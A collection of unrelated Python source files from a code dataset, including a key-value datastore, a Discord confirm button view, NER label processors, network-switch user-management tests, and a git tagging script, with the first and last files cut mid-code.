for key in keys_to_delete:
record.pop(key)
except KeyError:
pass
@utils.Synchronized
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn="",
max_records=None,
relaxed_order=False):
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
if after_urn:
after_urn = utils.SmartUnicode(after_urn)
subjects = []
for s in self.subjects:
if s.startswith(subject_prefix) and s > after_urn:
subjects.append(s)
subjects.sort()
return_count = 0
for s in subjects:
if max_records and return_count >= max_records:
break
r = self.subjects[s]
results = {}
for attribute in attributes:
attribute_list = r.get(attribute)
if attribute_list:
encoded_value, timestamp = attribute_list[-1]
value = self._value_converter.Decode(attribute, encoded_value)
results[attribute] = (timestamp, value)
if results:
return_count += 1
yield (s, results)
@utils.Synchronized
def ResolveMulti(self, subject, attributes, timestamp=None, limit=None):
subject = utils.SmartUnicode(subject)
# Does timestamp represent a range?
if isinstance(timestamp, (list, tuple)):
start, end = timestamp # pylint: disable=unpacking-non-sequence
else:
start, end = -1, 1 << 65
start = int(start)
end = int(end)
if isinstance(attributes, str):
attributes = [attributes]
try:
record = self.subjects[subject]
except KeyError:
return
# Holds all the attributes which matched. Keys are attribute names, values
# are lists of timestamped data.
results = {}
for attribute in attributes:
for attr, values in iteritems(record):
if attr == attribute:
for encoded_value, ts in values:
results_list = results.setdefault(attribute, [])
# If we are always after the latest ts we clear older ones.
if (results_list and timestamp == self.NEWEST_TIMESTAMP and
results_list[0][1] < ts):
results_list = []
results[attribute] = results_list
# Timestamp outside the range, drop it.
elif ts < start or ts > end:
continue
value = self._value_converter.Decode(attribute, encoded_value)
results_list.append((attribute, ts, value))
# Return the results in the same order they requested.
remaining_limit = limit
for attribute in attributes:
# This returns triples of (attribute_name, timestamp, data). We want to
# sort by timestamp.
for _, ts, data in sorted(
results.get(attribute, []), key=lambda x: x[1], reverse=True):
if remaining_limit:
remaining_limit -= 1
if remaining_limit == 0:
yield (attribute, data, ts)
return
yield (attribute, data, ts)
@utils.Synchronized
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None):
unicode_to_orig = {utils.SmartUnicode(s): s for s in subjects}
result = {}
for unicode_subject, orig_subject in iteritems(unicode_to_orig):
values = self.ResolvePrefix(
unicode_subject, attribute_prefix, timestamp=timestamp, limit=limit)
if not values:
continue
if limit:
if limit < len(values):
values = values[:limit]
result[orig_subject] = values
limit -= len(values)
if limit <= 0:
return iteritems(result)
else:
result[orig_subject] = values
return iteritems(result)
def Flush(self):
pass
@utils.Synchronized
def ResolvePrefix(self, subject, attribute_prefix, timestamp=None,
limit=None):
"""Resolve all attributes for a subject starting with a prefix."""
subject = utils.SmartUnicode(subject)
if timestamp in [None, self.NEWEST_TIMESTAMP, self.ALL_TIMESTAMPS]:
start, end = 0, (2**63) - 1
# Does timestamp represent a range?
elif isinstance(timestamp, (list, tuple)):
start, end = timestamp # pylint: disable=unpacking-non-sequence
else:
raise ValueError("Invalid timestamp: %s" % timestamp)
start = int(start)
end = int(end)
if isinstance(attribute_prefix, str):
attribute_prefix = [attribute_prefix]
try:
record = self.subjects[subject]
except KeyError:
return []
# Holds all the attributes which matched. Keys are attribute names, values
# are lists of timestamped data.
results = {}
nr_results = 0
for prefix in attribute_prefix:
for attribute, values in iteritems(record):
if limit and nr_results >= limit:
break
if utils.SmartStr(attribute).startswith(prefix):
for encoded_value, ts in values:
results_list = results.setdefault(attribute, [])
# If we are always after the latest ts we clear older ones.
if (results_list and timestamp in [self.NEWEST_TIMESTAMP, None] and
results_list[0][1] < ts):
results_list = []
results[attribute] = results_list
# Timestamp outside the range, drop it.
elif ts < start or ts > end:
continue
value = self._value_converter.Decode(attribute, encoded_value)
results_list.append((attribute, ts, value))
nr_results += 1
if limit and nr_results >= limit:
break
result = []
for attribute_name, values in sorted(iteritems(results)):
# Values are triples of (attribute_name, timestamp, data). We want to
# sort by timestamp.
for _, ts, data in sorted(values, key=lambda x: x[1], reverse=True):
# Return triples (attribute_name, data, timestamp).
result.append((attribute_name, data, ts))
return result
def Size(self):
total_size = sys.getsizeof(self.subjects)
for subject, record in iteritems(self.subjects):
total_size += sys.getsizeof(subject)
total_size += sys.getsizeof(record)
for attribute, values in iteritems(record):
total_size += sys.getsizeof(attribute)
total_size += sys.getsizeof(values)
for value, timestamp in values:
total_size += sys.getsizeof(value)
total_size += sys.getsizeof(timestamp)
return total_size
def PrintSubjects(self, literal=None):
for s in sorted(self.subjects):
if literal and literal not in s:
continue
print(s)
|
StarcoderdataPython
|
1766927
|
<filename>src/ext/confirmer.py
import discord
class ConfirmerSession:
"""Class that interactively paginates
a set of embed using reactions."""
def __init__(self, page, color=discord.Color.green(), footer=''):
"""Confirmer, for confirming things obv duh."""
super().__init__()
self.page = page # the list of embeds list[discord.Embed, discord.Embed]
async def run(self, message):
"""Asks the user a question to confirm something."""
# We create the view and assign it to a variable so we can wait for it later.
view = Confirm()
message = await message.edit(embed=self.page, view=view)
# Wait for the View to stop listening for input...
await view.wait()
message = await message.edit(embed=self.page, view=view)
if view.value is None:
return False, message
elif view.value:
return True, message
else:
return False, message
# Define a simple View that gives us a confirmation menu
class Confirm(discord.ui.View):
def __init__(self):
super().__init__()
self.value = None
# This one is similar to the confirmation button except sets the inner value to `False`
@discord.ui.button(label="Cancel", style=discord.ButtonStyle.red)
async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = False
self.stop()
self.remove_item(self.children[0])
self.remove_item(self.children[0])
# When the confirm button is pressed, set the inner value to `True` and
# stop the View from listening to more input.
# We also send the user an ephemeral message that we're confirming their choice.
@discord.ui.button(label="Confirm", style=discord.ButtonStyle.green)
async def confirm(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = True
self.stop()
self.remove_item(self.children[0])
self.remove_item(self.children[0])
|
StarcoderdataPython
|
1654458
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: <NAME>
# Description:
# mrc_ner_data_processor.py
import os
from mrc_utils import read_mrc_ner_examples
class QueryNERProcessor(object):
# processor for the query-based ner dataset
def get_examples(self, data_dir, data_sign):
data = read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner."+data_sign))
return data
# def get_train_examples(self, data_dir):
# data = read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.train"))
# return data
# def get_dev_examples(self, data_dir):
# return read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.dev"))
# def get_test_examples(self, data_dir):
# return read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.test"))
class Conll03Processor(QueryNERProcessor):
def get_labels(self, ):
return ["ORG", "PER", "LOC", "MISC", "O"]
class MSRAProcessor(QueryNERProcessor):
def get_labels(self, ):
return ["NS", "NR", "NT", "O"]
class Onto4ZhProcessor(QueryNERProcessor):
def get_labels(self, ):
return ["LOC", "PER", "GPE", "ORG", "O"]
class Onto5EngProcessor(QueryNERProcessor):
def get_labels(self, ):
return ['ORDINAL', 'CARDINAL', 'LOC', 'WORK_OF_ART', 'LANGUAGE', 'ORG', 'FAC', 'PERSON', 'EVENT', 'TIME', 'LAW', 'NORP', 'PERCENT', 'DATE', 'GPE', 'QUANTITY', 'PRODUCT', 'MONEY', 'O']
class ResumeZhProcessor(QueryNERProcessor):
def get_labels(self, ):
return ["ORG", "LOC", "NAME", "RACE", "TITLE", "EDU", "PRO", "CONT", "O"]
class GeniaProcessor(QueryNERProcessor):
def get_labels(self, ):
return ['cell_line', 'cell_type', 'DNA', 'RNA', 'protein', "O"]
class ACE2005Processor(QueryNERProcessor):
def get_labels(self, ):
return ["GPE", "ORG", "PER", "FAC", "VEH", "LOC", "WEA", "O"]
class ACE2004Processor(QueryNERProcessor):
def get_labels(self, ):
return ["GPE", "ORG", "PER", "FAC", "VEH", "LOC", "WEA", "O"]
|
StarcoderdataPython
|
1646231
|
<reponame>mo-cmyk/wbgapi
'''Access information about World Bank lending groups. This works best with the WDI (source=2)
and other databases that share the same list of economies. It will probably not work
well with subnational databases or region-specific ones.
'''
import wbgapi as w
from . import utils
import builtins
def list(id='all', q=None):
'''Return a list of lending groups
Arguments:
id: a lending group identifier or list-like of identifiers
q: search string (on lending group name)
Returns:
a generator object
Example:
lendingGroups = {row['id']: row['value'] for row in wbapi.lending.list()}
Notes:
The lending group list is global to the entire API and is not specific to the current database.
'''
q,_ = utils.qget(q)
for row in w.fetch('lendingtype/' + w.queryParam(id)):
if utils.qmatch(q, row['value']):
yield row
def get(id):
'''Retrieve the specified lending group
Arguments:
id: the lending group ID
Returns:
a lending group object
Example:
print(wbgapi.lending.get('IBD')['value'])
'''
return w.get('lendingtype/' + w.queryParam(id))
def members(id):
'''Return a set of economy identifiers that are members of the specified lending group
Arguments:
id: a lending group identifier
Returns:
a set object of economy identifiers
Notes:
the returned members may not match the economies in the current database since we access the universal region lists from the API
'''
return w.region.members(id, 'lendingtype')
def Series(id='all', q=None, name='LendingGroupName'):
'''Return a pandas Series object by calling list
'''
return w.Series(list(id, q=q), name=name)
def info(id='all', q=None):
'''Print a user report of lending groups
Arguments:
id: a lending group identifier or list-like of identifiers
q: search string (on lending group name)
Returns:
None
Notes:
The lending group list is global to the entire API and is not specific to the current database.
'''
return w.Featureset(list(id, q=q))
|
StarcoderdataPython
|
53115
|
import pytest
from pynetworking.Device import Device
def setup_dut(dut):
dut.reset()
dut.add_cmd({'cmd': 'show version', 'state': -1, 'action': 'PRINT', 'args': ["""
AlliedWare Plus (TM) 5.4.2 09/25/13 12:57:26
Build name : x600-5.4.2-3.14.rel
Build date : Wed Sep 25 12:57:26 NZST 2013
Build type : RELEASE
"""]})
def test_add_user(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username testuser privilege 5 password enemy', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
assert 'testuser' not in d.user.keys()
d.user.create("testuser", password="<PASSWORD>", privilege_level=5)
assert 'testuser' in d.user.keys()
assert d.user['testuser']['privilege_level'] == '5'
with pytest.raises(KeyError) as excinfo:
d.user.create("", password="<PASSWORD>", privilege_level=5)
assert 'user name cannot be empty' in excinfo.value
with pytest.raises(KeyError) as excinfo:
d.user.create("testuser", password="<PASSWORD>", privilege_level=5)
assert 'user name {0} already exists'.format('testuser') in excinfo.value
d.close()
def test_change_user_password(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 $<PASSWORD>HL/fM2F5<PASSWORD>c/54ZQ.
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_2 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username testuser password <PASSWORD>', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
dut.add_cmd({'cmd': 'username testuser password enemy', 'state': 1, 'action': 'SET_STATE', 'args': [2]})
dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
old_pwd = d.user['testuser']['password']
d.user.update("testuser", password="<PASSWORD>")
assert old_pwd != d.user['testuser']['password']
old_pwd = d.user['testuser']['password']
d.user.update("testuser", password="<PASSWORD>")
assert old_pwd != d.user['testuser']['password']
old_pwd = d.user['testuser']['password']
d.user.update("testuser", password="<PASSWORD>")
with pytest.raises(KeyError) as excinfo:
d.user.update("")
assert 'user name cannot be empty' in excinfo.value
with pytest.raises(KeyError) as excinfo:
d.user.update("xxxxxxxxxxxxxxxx", password="<PASSWORD>")
assert 'user name xxxxxxxxxxxxxxxx does not exist' in excinfo.value
d.close()
def test_change_user_privilege(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 $1$bJoVec4D$JwOJGPr7YqoExA0GVasdE0
username testuser privilege 5 password 8 $1$uWpWUKfS$l0FbezBRUBllEpc8.9kIF/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 $1$<PASSWORD>$JwOJGPr7YqoExA0GVasdE0
username testuser password 8 $1$uWpWUKfS$l0FbezBRUBllEpc8.9kIF/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_2 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
username testuser privilege 5 password <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username testuser privilege 1', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
dut.add_cmd({'cmd': 'username testuser privilege 5', 'state': 1, 'action': 'SET_STATE', 'args': [2]})
dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
assert d.user['testuser']['privilege_level'] == '5'
d.user.update("testuser", privilege_level=1)
assert d.user['testuser']['privilege_level'] == '1'
d.user.update("testuser", privilege_level=5)
assert d.user['testuser']['privilege_level'] == '5'
d.close()
def test_remove_user(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
username testuser privilege 5 password <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'no username testuser', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
d.user.delete("testuser")
with pytest.raises(KeyError):
d.user['testuser']
d.close()
def test_encrypted_password(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username encuser privilege 10 password <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_2 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username encuser privilege 10 password 8 $1$CE<PASSWORD>$3JfHL/fM2F5YS47c/54ZQ.
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_3 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
# Regular expressions are used. In emulated mode, if the password contains metacharacters like: . ^ $ * + ? { [ ] \ | ( )
# prepone them a \ character, otherwise they won't match. Follow the example here below.
enc_pwd_1 = <PASSWORD>/'
enc_pwd_2 = <PASSWORD>.'
re_enc_pwd_1 = <PASSWORD>/'
re_enc_pwd_2 = '\<PASSWORD>\.'
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username\s+encuser\s+privilege\s+10\s+password\s+8\s+' + re_enc_pwd_1, 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
dut.add_cmd({'cmd': 'username\s+encuser\s+password\s+8\s+' + re_enc_pwd_2, 'state': 1, 'action': 'SET_STATE', 'args': [2]})
dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2})
dut.add_cmd({'cmd': 'no username encuser', 'state': 2, 'action': 'SET_STATE', 'args': [3]})
dut.add_cmd({'cmd': 'show running-config', 'state': 3, 'action': 'PRINT', 'args': config_3})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
assert 'encuser' not in d.user.keys()
d.user.create("encuser", password=<PASSWORD>, privilege_level=10, encrypted=True)
assert ('encuser', {'password': <PASSWORD>, 'privilege_level': '10'}) in d.user.items()
d.user.update("encuser", password=<PASSWORD>, encrypted=True)
assert ('encuser', {'password': <PASSWORD>, 'privilege_level': '10'}) in d.user.items()
d.user.delete("encuser")
with pytest.raises(KeyError):
d.user['encuser']
with pytest.raises(KeyError) as excinfo:
d.user.delete("")
assert 'user name cannot be empty' in excinfo.value
with pytest.raises(KeyError) as excinfo:
d.user.delete("xxxxxxxxxxxxxxxx")
assert 'user name xxxxxxxxxxxxxxxx does not exist' in excinfo.value
d.close()
|
StarcoderdataPython
|
3388685
|
<reponame>sinahmr/parted-vae
import json
import torch
from partedvae.models import VAE
def load(path, img_size, disc_priors, device):
path_to_specs = path + 'specs.json'
path_to_model = path + 'model.pt'
with open(path_to_specs) as specs_file:
specs = json.load(specs_file)
latent_spec = specs["latent_spec"]
model = VAE(img_size=img_size, latent_spec=latent_spec, c_priors=disc_priors, device=device)
model.load_state_dict(torch.load(path_to_model, map_location=lambda storage, loc: storage))
return model
|
StarcoderdataPython
|
195721
|
import os
import numpy as np
import cv2
import csv
import utils
output_dir = "./multipleBackgroundsCorners"
if (not os.path.isdir(output_dir)):
os.mkdir(output_dir)
dir = "../data1"
import csv
with open(output_dir+"/gt.csv", 'a') as csvfile:
spamwriter_1 = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
for image in os.listdir(dir):
if image.endswith("jpg"):
if os.path.isfile(dir+"/"+image+".csv"):
with open(dir+"/"+image+ ".csv", 'r') as csvfile:
spamwriter = csv.reader(csvfile, delimiter=' ',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
img = cv2.imread(dir +"/"+ image)
print image
gt= []
for row in spamwriter:
gt.append(row)
# img = cv2.circle(img, (int(float(row[0])), int(float(row[1]))), 2,(255,0,0),90)
gt =np.array(gt).astype(np.float32)
# print gt
gt = gt / (img.shape[1], img.shape[0])
gt = gt * (1080, 1080)
img = cv2.resize(img, ( 1080,1080))
# for a in range(0,4):
# img = cv2.circle(img, tuple((gt[a].astype(int))), 2, (255, 0, 0), 9)
# cv2.imwrite("asda.jpg", img)
# 0/0
for angle in range(0,271,90):
img_rotate, gt_rotate = utils.rotate(img, gt,angle)
for random_crop in range(0,1):
img_list, gt_list = utils.getCorners(img_rotate, gt_rotate)
for a in range(0,4):
cv2.circle(img_list[a], tuple(gt_list[a]), 2,(255,0,0),2)
cv2.imwrite( output_dir+"/"+image + str(angle) +str(random_crop) + str(a) +".jpg", img_list[a])
spamwriter_1.writerow(( image + str(angle) +str(random_crop) + str(a) +".jpg", tuple(gt_list[a])))
|
StarcoderdataPython
|
1668209
|
<reponame>adrienbrunet/mixt
# coding: mixt
"""Ensure that the space before the ``/`` character is not mandatory"""
from mixt import html
from mixt.element import Element
def test_normal_tag_without_props():
assert str(<button />) == '<button></button>'
assert str(<button/>) == '<button></button>'
def test_normal_tag_with_props():
assert str(<button name="foo" />) == '<button name="foo"></button>'
assert str(<button name="foo"/>) == '<button name="foo"></button>'
def test_nochild_tag_without_props():
assert str(<link />) == '<link />'
assert str(<link/>) == '<link />'
def test_nochild_tag_with_props():
assert str(<link rel="foo" />) == '<link rel="foo" />'
assert str(<link rel="foo"/>) == '<link rel="foo" />'
def test_new_element_without_props():
class Foo(Element):
def render(self, context):
return <div data-name="foo"/>
assert str(<Foo />) == '<div data-name="foo"></div>'
assert str(<Foo/>) == '<div data-name="foo"></div>'
def test_new_element_with_props():
class Foo(Element):
class PropTypes:
name: str
def render(self, context):
return <div data-name="{self.name}"/>
assert str(<Foo name="foo" />) == '<div data-name="foo"></div>'
assert str(<Foo name="foo"/>) == '<div data-name="foo"></div>'
def test_with_python_value_at_the_end():
assert str(<button name={"foo"} />) == '<button name="foo"></button>'
assert str(<button name={"foo"}/>) == '<button name="foo"></button>'
assert str(<button name={"foo"} ></button>) == '<button name="foo"></button>'
assert str(<button name={"foo"}></button>) == '<button name="foo"></button>'
def test_with_python_kwargs_at_the_end():
kwargs = {'name': 'foo'}
assert str(<button {**kwargs} />) == '<button name="foo"></button>'
assert str(<button {**kwargs}/>) == '<button name="foo"></button>'
assert str(<button {**kwargs} ></button>) == '<button name="foo"></button>'
assert str(<button {**kwargs}></button>) == '<button name="foo"></button>'
|
StarcoderdataPython
|
138331
|
<gh_stars>0
import random
import numpy as np
import pandas as pd
import tqdm as tqdm
import matplotlib.pyplot as plt
# Initialize and create dataframe
headers = ['Particle_X', 'Particle_Y', 'q1', 'q2',
'q3', 'q4', 'q5', 'q6', 'Velocity_X', 'Velocity_Y']
dataset = pd.DataFrame(columns=headers)
# Physical Dimensions of 2D Hele-Shaw Cell
H = 1
w = 1
particle = 1
velocity = []
n = 6
# X represents the position of the particle (must be within the boundary)
x = []
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return str((self.x, self.y))
class Circle:
def __init__(self, origin, radius):
self.origin = origin
self.radius = radius
origin = Point(0, 0)
radius = w
circle = Circle(origin, radius)
for i in range(particle):
p = random.random() * 2 * np.pi
r = circle.radius * np.sqrt(random.random())
x.append([r * np.cos(p), r * np.sin(p)])
ParticleLocation = np.array(x)
# Q represents the vector that contains elements that represent the point flow rate values
# Summation of all Q must be = 0 to satisfy mass conservation
Q = []
for i in range(n-1):
Q.append(random.uniform(-1.0, 1.0))
Q.append(0-sum(Q))
# R represents the vector that contains elements that represent the coordinates of the ith source/sink
R = []
# Plotting the Circle and its inlets/outlets #
theta = np.linspace(0, 2 * np.pi, 100)
r = np.sqrt(1.0)
x1 = w * np.cos(theta)
x2 = w * np.sin(theta)
fig, ax = plt.subplots(1)
ax.plot(x1, x2)
ax.set_aspect(1)
plt.xlim(-1.25 * w, 1.25 * w)
plt.ylim(-1.25 * w, 1.25 * w)
plt.grid(linestyle='--')
plt.title('2D Hele-Shaw Point Source Model', fontsize=8)
plt.savefig("plot_circle_matplotlib_01.png", bbox_inches='tight')
# Determines the coordinates of the point sources/sinks based on number of inlet/outlet defined by n
for i in range(n):
R_coordinates = [w * np.cos(2 * (i - 1.0) * np.pi / n),
w * np.sin(2 * (i - 1.0) * np.pi / n)]
R.append(R_coordinates)
PointSource = np.array(R)
for n, txt in enumerate(Q):
ax.annotate('{:.3f}'.format(txt), (R[n]))
plt.scatter(*zip(*x))
plt.scatter(*zip(*R))
plt.show()
# Given the defined inlet/outlets, the velocity of the particle
for i in range(n):
velocity.append(
Q[i] * (ParticleLocation - (R[i])) / (np.linalg.norm((ParticleLocation - (R[i]))))**2)
# Prints numerical results (for testing)
print("The randomized particle location, X : ")
print(ParticleLocation)
print("The randomized inlet and outlet flowrates Q : ")
print(np.array(Q))
print("The locations of the inlet/outlet : ")
print(PointSource)
print("The velocity of the particle : ")
print((sum(velocity)))
|
StarcoderdataPython
|
1619419
|
#!/usr/bin/env python
"""
This is a script to automatically tag repos on GitHub.
Sample usage:
* To create a tag:
$ python tagz.py -r mozilla/fireplace -c create -t 2014.02.11
NOTE: annotated tags are used by default (-a). If you want lightweight tags,
you can pass -l:
$ python tagz.py -l -r mozilla/fireplace -c create -t 2014.02.11
ALSO: this script will use whatever type of tag the first found refname is.
You cannot use this script to mix use of the two in the same repo.
* To create multiple tags:
$ python tagz.py -r mozilla/zamboni,mozilla/fireplace -c create -t 2014.02.11
* To delete a tag:
$ python tagz.py -r mozilla/fireplace -c delete -t 2014.02.11
* To cherry-pick a commit onto a tag:
$ python tagz.py -r mozilla/fireplace -c cherrypick -t 2014.02.11 -s b4dc0ffee
* To remove a commit from a tag:
$ python tagz.py -r mozilla/fireplace -c revert -t 2014.02.11 -s b4dc0ffee
"""
import datetime
import os
import platform
import subprocess
import argparse
GIT_ROOT_PATH = '/tmp/'
VERBOSE = False
DRYRUN = False
def _open_pipe(cmd, cwd=None):
return subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=cwd)
def get_team_repo(remote_url):
"""
Takes remote URL (e.g., `<EMAIL>:mozilla/fireplace.git`) and
returns team/repo pair (e.g., `mozilla/fireplace`).
"""
if ':' not in remote_url:
return remote_url
return remote_url.split(':')[1].replace('.git', '')
def get_remote_url(remote_url):
"""
Takes a GitHub remote URL (e.g., `mozilla/fireplace`) and
returns full remote URL (e.g., `<EMAIL>:mozilla/fireplace.git`).
"""
if ':' not in remote_url:
remote_url = '<EMAIL>:' + remote_url
if not remote_url.endswith('.git'):
remote_url += '.git'
return remote_url
def get_git_path(remote_url):
repo = ''.join(x for x in get_team_repo(remote_url)
if x.isalnum() or x == '/')
dir_name = os.path.join(GIT_ROOT_PATH, repo.replace('/', '__'))
if not os.path.exists(dir_name):
os.makedirs(dir_name)
git(dir_name,
'clone {remote_url} {dir_name}'.format(remote_url=remote_url,
dir_name=dir_name))
return dir_name
def get_github_url(team, repo, url=''):
return 'https://github.com/{team}/{repo}{url}'.format(
team=team, repo=repo, url=url)
def git(path, args, limit=None):
if DRYRUN:
print 'cd %s; git %s' % (path, args)
return ''
if limit:
stdout, stderr = _open_pipe(['git'] + args.split(' ', limit),
cwd=path).communicate()
else:
stdout, stderr = _open_pipe(['git'] + args.split(' '),
cwd=path).communicate()
if VERBOSE and stderr:
print stderr
return stderr or stdout
def git_create_tag(path, tag, annotated):
# Create new tag. Assumes tag has no spaces.
if annotated:
git(path, 'tag -a %s -m tag for %s' % (tag, tag), 4)
else:
git(path, 'tag %s' % tag)
# Push tag.
git(path, 'push --tags')
def git_delete_tag(path, tag):
# Delete tag.
git(path, 'tag -d %s' % tag)
# Delete remote tag.
git(path, 'push origin :%s' % tag)
def pbcopy(data):
"""Copy to clipboard on Mac OS X/Linux."""
mac, linux = False, False
if os.name == 'mac' or platform.system() == 'Darwin':
mac = True
elif os.name == 'posix' or platform.system() == 'Linux':
linux = True
else:
return
if mac:
pb = _open_pipe(['pbcopy'])
elif linux:
pb = _open_pipe(['xsel', '--clipboard', '--input'])
pb.stdin.write(data)
pb.stdin.close()
return pb.wait()
def resolve_annotate(path, use_annotate):
"""Be internally consistent with tag type."""
retval = use_annotate
first_tag = (git(path, 'for-each-ref refs/tags --sort=refname --count=1 '
'--format="%(taggerdate:raw)|%(refname:strip=2)"')
.strip(' \n')
.replace('"', '')
.split('|'))
if len(first_tag) > 1:
if ((use_annotate and first_tag[0] == '') or
(not use_annotate and first_tag[0] != '')):
retval = not use_annotate
return retval
def main():
global VERBOSE, DRYRUN
p = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
p.add_argument('-c', '--command', dest='cmd', action='store',
choices=['cherrypick', 'create', 'delete', 'revert'],
help='command to run')
p.add_argument('-r', '--repo', dest='repo', action='store', default='',
help='remote repository URL (e.g., '
'`[email protected]:mozilla/fireplace.git` or '
